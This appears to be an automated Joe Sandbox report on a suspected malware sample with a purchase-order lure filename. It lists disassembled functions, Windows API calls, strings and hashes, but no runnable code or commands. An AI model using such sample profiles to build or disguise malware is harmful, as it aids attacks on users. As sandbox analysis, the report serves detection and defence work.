                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        • Opcode ID: 57bba90868cc04e2a4c66367997da6ff617689a52d01d489cc4e4a9d42c852f1
                        • Instruction ID: da2e5e6d02fd36d1e71f42478f6f09885df1bcc5d17ec906ee1512f084d7c4e6
                        • Opcode Fuzzy Hash: 57bba90868cc04e2a4c66367997da6ff617689a52d01d489cc4e4a9d42c852f1
                        • Instruction Fuzzy Hash: 9831C031AA4606A6DB15EB61CD13EEE73A49F20784FA14026F441710DAFF916F34CA51
                        Function 002EF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000063), ref: 002EF8AB
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002EF8BD
                        • SetWindowTextW.USER32(?,?), ref: 002EF8D4
                        • GetDlgItem.USER32(?,000003EA), ref: 002EF8E9
                        • SetWindowTextW.USER32(00000000,?), ref: 002EF8EF
                        • GetDlgItem.USER32(?,000003E9), ref: 002EF8FF
                        • SetWindowTextW.USER32(00000000,?), ref: 002EF905
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002EF926
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002EF940
                        • GetWindowRect.USER32(?,?), ref: 002EF949
                        • SetWindowTextW.USER32(?,?), ref: 002EF9B4
                        • GetDesktopWindow.USER32 ref: 002EF9BA
                        • GetWindowRect.USER32(00000000), ref: 002EF9C1
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002EFA0D
                        • GetClientRect.USER32(?,?), ref: 002EFA1A
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002EFA3F
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002EFA6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: 385168b1628f32b96324ebb5b4588f71f4251c0d700fde67d4c03d6678845cbd
                        • Instruction ID: 7e48ea9fe834a3c25e56fe563cb79e8ec427b5ee0699c8c98131522dd93cc484
                        • Opcode Fuzzy Hash: 385168b1628f32b96324ebb5b4588f71f4251c0d700fde67d4c03d6678845cbd
                        • Instruction Fuzzy Hash: 6C518E7090070AAFDB21DFA9DE86F6EBBF9FF04704F404928E596A65A1C774A854CF00
                        Function 0031CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0031CD0B
                        • DestroyWindow.USER32(?,?), ref: 0031CD83
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0031CE04
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0031CE26
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031CE35
                        • DestroyWindow.USER32(?), ref: 0031CE52
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002B0000,00000000), ref: 0031CE85
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0031CEA4
                        • GetDesktopWindow.USER32 ref: 0031CEB9
                        • GetWindowRect.USER32(00000000), ref: 0031CEC0
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0031CED2
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0031CEEA
                          • Part of subcall function 002CB155: GetWindowLongW.USER32(?,000000EB), ref: 002CB166
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        • Opcode ID: b93e4f20cbec69d126cc9bbab12bd5d3cd5ed041db2b2b5978d68d97dc84c1b6
                        • Instruction ID: aff2588af4b2efd56a0aac77b5f2b8574e025cf4c88ae7c4cbc75104657e4c23
                        • Opcode Fuzzy Hash: b93e4f20cbec69d126cc9bbab12bd5d3cd5ed041db2b2b5978d68d97dc84c1b6
                        • Instruction Fuzzy Hash: 5F71DF711A0309AFD72ACF68CC85FA63BE9FB89744F48051CF985972A1D770E851CB22
                        Function 0031F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DragQueryPoint.SHELL32(?,?), ref: 0031F14B
                          • Part of subcall function 0031D5EE: ClientToScreen.USER32(?,?), ref: 0031D617
                          • Part of subcall function 0031D5EE: GetWindowRect.USER32(?,?), ref: 0031D68D
                          • Part of subcall function 0031D5EE: PtInRect.USER32(?,?,0031EB2C), ref: 0031D69D
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0031F1B4
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0031F1BF
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0031F1E2
                        • _wcscat.LIBCMT ref: 0031F212
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0031F229
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0031F242
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0031F259
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0031F27B
                        • DragFinish.SHELL32(?), ref: 0031F282
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0031F36D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        • Opcode ID: de2822cb3e39afa818efcb05379e93ad0555120200e4dea204545ace639c08c4
                        • Instruction ID: d6dcd508c8d232dca6c25513073229bbac578d888b56d6de34fe27acf7b79f28
                        • Opcode Fuzzy Hash: de2822cb3e39afa818efcb05379e93ad0555120200e4dea204545ace639c08c4
                        • Instruction Fuzzy Hash: BF618A72008300AFC316EF64DC85E9BBBF8FF89750F104A2DF595921A1DB309A59CB52
                        Function 002FB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 002FB46D
                        • VariantCopy.OLEAUT32(?,?), ref: 002FB476
                        • VariantClear.OLEAUT32(?), ref: 002FB482
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002FB561
                        • __swprintf.LIBCMT ref: 002FB591
                        • VarR8FromDec.OLEAUT32(?,?), ref: 002FB5BD
                        • VariantInit.OLEAUT32(?), ref: 002FB63F
                        • SysFreeString.OLEAUT32(00000016), ref: 002FB6D1
                        • VariantClear.OLEAUT32(?), ref: 002FB727
                        • VariantClear.OLEAUT32(?), ref: 002FB736
                        • VariantInit.OLEAUT32(00000000), ref: 002FB772
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 3730832054-3931177956
                        • Opcode ID: a5cb26b0ba31174d40383446f506b9ccf7a3e4efaee844d5e60f1c0a0d49ba4c
                        • Instruction ID: 651616689a73af594f8e646d39e6c474f5fd54585bd55bad3fdd1a3b0cfb2466
                        • Opcode Fuzzy Hash: a5cb26b0ba31174d40383446f506b9ccf7a3e4efaee844d5e60f1c0a0d49ba4c
                        • Instruction Fuzzy Hash: 09C10371A2021ADBCB129F65D4A4B7AF7B8FF09380F248475E6059B542CBB0EC64DF90
                        Function 00316F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00316FF9
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00317044
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        • Opcode ID: 5b007a41b417ed761495c2fcd48f40b17bbd7d8e365041a323ca143955c562d7
                        • Instruction ID: df8ddbddaa57da404c76963b080b76af07b4c42017c91ad15f045b7068b6c975
                        • Opcode Fuzzy Hash: 5b007a41b417ed761495c2fcd48f40b17bbd7d8e365041a323ca143955c562d7
                        • Instruction Fuzzy Hash: 8F91A3342143019FCB19EF14C851BAAB7B6AF88354F18896DF8965B392CB31ED5ACF41
                        Function 0031E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0031E3BB
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00319615,?), ref: 0031E417
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E457
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E49C
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E4D3
                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00319615,?), ref: 0031E4DF
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0031E4EF
                        • DestroyIcon.USER32(?), ref: 0031E4FE
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0031E51B
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0031E527
                          • Part of subcall function 002D1BC7: __wcsicmp_l.LIBCMT ref: 002D1C50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        • Opcode ID: 690e1071a5be1fb027dea1a0da10276ee55180d37cddd284a1ff17fd0e22fd50
                        • Instruction ID: 8fbb38b32c3181fa640e27975c9658b84b40d3ba0f6137940e6cf11f916e7bc7
                        • Opcode Fuzzy Hash: 690e1071a5be1fb027dea1a0da10276ee55180d37cddd284a1ff17fd0e22fd50
                        • Instruction Fuzzy Hash: A061CD71510214BAEB1ADF64DC86FFA77ACAB08710F108206F915E71D0EB75A9A0DBA0
                        Function 00300E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00300EFF
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00300F0F
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00300F1B
                        • __wsplitpath.LIBCMT ref: 00300F79
                        • _wcscat.LIBCMT ref: 00300F91
                        • _wcscat.LIBCMT ref: 00300FA3
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00300FB8
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300FCC
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300FFE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0030101F
                        • _wcscpy.LIBCMT ref: 0030102B
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0030106A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                        • String ID: *.*
                        • API String ID: 3566783562-438819550
                        • Opcode ID: 1c12a6bee827c57fb88b2c89e406dec9205046bde480a2f29060c7cab1eeb55b
                        • Instruction ID: 3b09c5d7eb0f64b491082555180f4c3779a08f1c34b83778dabfaf6a6a0880d5
                        • Opcode Fuzzy Hash: 1c12a6bee827c57fb88b2c89e406dec9205046bde480a2f29060c7cab1eeb55b
                        • Instruction Fuzzy Hash: 93616AB6514705AFC711EF20C854A9BB3E8FF89310F00891AF989D7291EB31EA55CF92
                        Function 002FDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • CharLowerBuffW.USER32(?,?), ref: 002FDB26
                        • GetDriveTypeW.KERNEL32 ref: 002FDB73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDBBB
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDBF2
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDC20
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        • Opcode ID: 579f92dc85fb3ebc51ec4d62188c152493b88b8b96877b1737b3ad6c96e71879
                        • Instruction ID: 3c4dad1ca7c404a6f6bb949e0092be6d2f6def6a4c740d89310f64487baf34b6
                        • Opcode Fuzzy Hash: 579f92dc85fb3ebc51ec4d62188c152493b88b8b96877b1737b3ad6c96e71879
                        • Instruction Fuzzy Hash: 8A517A711243059FC700EF10C9819AAB7F9EF88798F00896DF896972A1DB71EE19CF41
                        Function 002F3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00324085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 002F3145
                        • LoadStringW.USER32(00000000,?,00324085,00000016), ref: 002F314E
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00324085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 002F3170
                        • LoadStringW.USER32(00000000,?,00324085,00000016), ref: 002F3173
                        • __swprintf.LIBCMT ref: 002F31B3
                        • __swprintf.LIBCMT ref: 002F31C5
                        • _wprintf.LIBCMT ref: 002F326C
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F3283
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 984253442-2268648507
                        • Opcode ID: 06dcb8e5c7f90f4a855d9d6596f24e34f4e37a93aaa8d8b015720858b97a973f
                        • Instruction ID: 348d2be260d386fbc1af3b84afbacb428b385efb8e23df49c31dab571b8255ed
                        • Opcode Fuzzy Hash: 06dcb8e5c7f90f4a855d9d6596f24e34f4e37a93aaa8d8b015720858b97a973f
                        • Instruction Fuzzy Hash: 1341427191021DAACB15FB90DD87EEFB77DAF14781F200065F605B20A2DA616F28CE61
                        Function 002FD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 002FD96C
                        • __swprintf.LIBCMT ref: 002FD98E
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002FD9CB
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002FD9F0
                        • _memset.LIBCMT ref: 002FDA0F
                        • _wcsncpy.LIBCMT ref: 002FDA4B
                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 002FDA80
                        • CloseHandle.KERNEL32(00000000), ref: 002FDA8B
                        • RemoveDirectoryW.KERNEL32(?), ref: 002FDA94
                        • CloseHandle.KERNEL32(00000000), ref: 002FDA9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 2733774712-3457252023
                        • Opcode ID: 3b8836098b242fd048b50caf3d78b3382eec7a7c1295023a4939497466167fe3
                        • Instruction ID: a30b618a18c40d416e68c522a6de4d275cc0bb29c7ab9697907dea86dfd568c8
                        • Opcode Fuzzy Hash: 3b8836098b242fd048b50caf3d78b3382eec7a7c1295023a4939497466167fe3
                        • Instruction Fuzzy Hash: 9A31E87291020DABDB21DFA4DC89FEA77BDAF84300F0085A5F515D2160E7709A508BA1
                        Function 002E957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                        • String ID:
                        • API String ID: 884005220-0
                        • Opcode ID: e631a0e02e3945853538317fa2ea48260026bab599c66e108674a2bb835c3860
                        • Instruction ID: 62108eac2e5bf11afcd3c5c2e94512894d6f59d7f8a0c26749727ca6d5314cd7
                        • Opcode Fuzzy Hash: e631a0e02e3945853538317fa2ea48260026bab599c66e108674a2bb835c3860
                        • Instruction Fuzzy Hash: 7461E4729B4242EFDB255F36DC41BA977ACAB01320FA00127E805D7291EB75CDE08EA4
                        Function 0031E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0031E564
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0031E57B
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0031E586
                        • CloseHandle.KERNEL32(00000000), ref: 0031E593
                        • GlobalLock.KERNEL32(00000000), ref: 0031E59C
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0031E5AB
                        • GlobalUnlock.KERNEL32(00000000), ref: 0031E5B4
                        • CloseHandle.KERNEL32(00000000), ref: 0031E5BB
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0031E5CC
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0033D9BC,?), ref: 0031E5E5
                        • GlobalFree.KERNEL32(00000000), ref: 0031E5F5
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0031E619
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0031E644
                        • DeleteObject.GDI32(00000000), ref: 0031E66C
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0031E682
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: 62a86ed2bc15902e4bbdd3ea2a3fe11d93af4b29c1c63cebf99a48c06b8660bd
                        • Instruction ID: 5e770ec5653d3da360c48744c33643ebd85140b274833b8816de0342e6e9ba98
                        • Opcode Fuzzy Hash: 62a86ed2bc15902e4bbdd3ea2a3fe11d93af4b29c1c63cebf99a48c06b8660bd
                        • Instruction Fuzzy Hash: 0A414975A00204AFDB129F65EC88EABBBBDEF89715F108058F906D7260D731AD40DB20
                        Function 00300B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                        Download Yara Rule
                        APIs
                        • __wsplitpath.LIBCMT ref: 00300C93
                        • _wcscat.LIBCMT ref: 00300CAB
                        • _wcscat.LIBCMT ref: 00300CBD
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00300CD2
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300CE6
